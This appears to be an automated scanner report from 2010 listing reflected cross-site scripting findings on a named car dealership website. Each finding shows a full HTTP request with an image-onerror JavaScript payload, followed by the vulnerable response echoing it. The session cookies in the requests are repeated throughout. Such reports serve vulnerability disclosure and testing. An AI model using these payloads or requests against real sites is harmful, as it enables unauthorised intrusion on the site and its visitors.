HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:44:06 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:44:06 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:44:07 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Sienna24cfd' ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Sienna24cfd'><img src=a onerror=alert(1)>1643c9e0dd9'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b91d<img%20src%3da%20onerror%3dalert(1)>900fb029992 was submitted in the REST URL parameter 2. This input was echoed as 2b91d<img src=a onerror=alert(1)>900fb029992 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x22b91d<img%20src%3da%20onerror%3dalert(1)>900fb029992/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:31:30 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:31:31 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:31:31 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x22b ...[SNIP]... <H1> Toyota Tacoma 4x22b91d<img src=a onerror=alert(1)>900fb029992</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16e5"><img%20src%3da%20onerror%3dalert(1)>13e7f5069df was submitted in the REST URL parameter 2. This input was echoed as e16e5"><img src=a onerror=alert(1)>13e7f5069df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x2e16e5"><img%20src%3da%20onerror%3dalert(1)>13e7f5069df/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:25:56 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:25:57 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:25:57 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16276
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x2e1 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tacoma 4x2e16e5"><img src=a onerror=alert(1)>13e7f5069df at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tacoma 4x2e16e5"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 569ac'><img%20src%3da%20onerror%3dalert(1)>dc11837832f was submitted in the REST URL parameter 2. This input was echoed as 569ac'><img src=a onerror=alert(1)>dc11837832f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x2569ac'><img%20src%3da%20onerror%3dalert(1)>dc11837832f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:28:43 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:28:43 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:28:44 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16309
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x256 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tacoma 4x2569ac'><img src=a onerror=alert(1)>dc11837832f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88460'><img%20src%3da%20onerror%3dalert(1)>5d2282c1747 was submitted in the REST URL parameter 2. This input was echoed as 88460'><img src=a onerror=alert(1)>5d2282c1747 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x488460'><img%20src%3da%20onerror%3dalert(1)>5d2282c1747/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:54:52 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:54:52 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:54:53 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16320
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x488 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tacoma 4x488460'><img src=a onerror=alert(1)>5d2282c1747'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b639e<img%20src%3da%20onerror%3dalert(1)>6472c642e7e was submitted in the REST URL parameter 2. This input was echoed as b639e<img src=a onerror=alert(1)>6472c642e7e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x4b639e<img%20src%3da%20onerror%3dalert(1)>6472c642e7e/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:56:36 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:56:36 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:56:37 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16272
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x4b6 ...[SNIP]... <H1> Toyota Tacoma 4x4b639e<img src=a onerror=alert(1)>6472c642e7e</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a1ef"><img%20src%3da%20onerror%3dalert(1)>de1c249dee was submitted in the REST URL parameter 2. This input was echoed as 2a1ef"><img src=a onerror=alert(1)>de1c249dee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%204x42a1ef"><img%20src%3da%20onerror%3dalert(1)>de1c249dee/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:53:34 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:53:34 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:53:35 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16284
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma 4x42a ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tacoma 4x42a1ef"><img src=a onerror=alert(1)>de1c249dee at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tacoma 4x42a1ef"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8937<img%20src%3da%20onerror%3dalert(1)>28d3df7f68d was submitted in the REST URL parameter 2. This input was echoed as f8937<img src=a onerror=alert(1)>28d3df7f68d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%20PreRunnerf8937<img%20src%3da%20onerror%3dalert(1)>28d3df7f68d/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:53:38 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:53:39 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:53:39 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma PreRu ...[SNIP]... <H1> Toyota Tacoma PreRunnerf8937<img src=a onerror=alert(1)>28d3df7f68d</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 326bf"><img%20src%3da%20onerror%3dalert(1)>3c3aeef81d8 was submitted in the REST URL parameter 2. This input was echoed as 326bf"><img src=a onerror=alert(1)>3c3aeef81d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%20PreRunner326bf"><img%20src%3da%20onerror%3dalert(1)>3c3aeef81d8/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:49:14 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:49:14 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:49:15 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16433
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma PreRu ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tacoma PreRunner326bf"><img src=a onerror=alert(1)>3c3aeef81d8 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tacoma PreRunner326bf"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7e9fe'><img%20src%3da%20onerror%3dalert(1)>89baf3c09f was submitted in the REST URL parameter 2. This input was echoed as 7e9fe'><img src=a onerror=alert(1)>89baf3c09f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tacoma%20PreRunner7e9fe'><img%20src%3da%20onerror%3dalert(1)>89baf3c09f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:51:36 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:51:37 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:51:37 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16404
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tacoma PreRu ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tacoma PreRunner7e9fe'><img src=a onerror=alert(1)>89baf3c09f'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8213c'><img%20src%3da%20onerror%3dalert(1)>01244b878b2 was submitted in the REST URL parameter 2. This input was echoed as 8213c'><img src=a onerror=alert(1)>01244b878b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x28213c'><img%20src%3da%20onerror%3dalert(1)>01244b878b2/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:38:19 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:38:19 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:38:20 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Crew Max 4x28213c'><img src=a onerror=alert(1)>01244b878b2'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 94ee5<img%20src%3da%20onerror%3dalert(1)>6742f235aaf was submitted in the REST URL parameter 2. This input was echoed as 94ee5<img src=a onerror=alert(1)>6742f235aaf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x294ee5<img%20src%3da%20onerror%3dalert(1)>6742f235aaf/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:40:23 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:40:24 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:40:24 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16313
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <H1> Toyota Tundra Crew Max 4x294ee5<img src=a onerror=alert(1)>6742f235aaf</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 312f1"><img%20src%3da%20onerror%3dalert(1)>e6759eebc0a was submitted in the REST URL parameter 2. This input was echoed as 312f1"><img src=a onerror=alert(1)>e6759eebc0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x2312f1"><img%20src%3da%20onerror%3dalert(1)>e6759eebc0a/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:35:02 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:35:02 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:35:03 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Tundra Crew Max 4x2312f1"><img src=a onerror=alert(1)>e6759eebc0a at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Tundra Crew Max 4x2312f1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 733e9'><img%20src%3da%20onerror%3dalert(1)>89d25a92153 was submitted in the REST URL parameter 2. This input was echoed as 733e9'><img src=a onerror=alert(1)>89d25a92153 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x4733e9'><img%20src%3da%20onerror%3dalert(1)>89d25a92153/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:57:37 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:57:37 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:57:38 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16327
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Tundra Crew ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Tundra Crew Max 4x4733e9'><img src=a onerror=alert(1)>89d25a92153'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a2dc"><img%20src%3da%20onerror%3dalert(1)>74497de5b9f was submitted in the REST URL parameter 2. This input was echoed as 4a2dc"><img src=a onerror=alert(1)>74497de5b9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Tundra%20Crew%20Max%204x44a2dc"><img%20src%3da%20onerror%3dalert(1)>74497de5b9f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
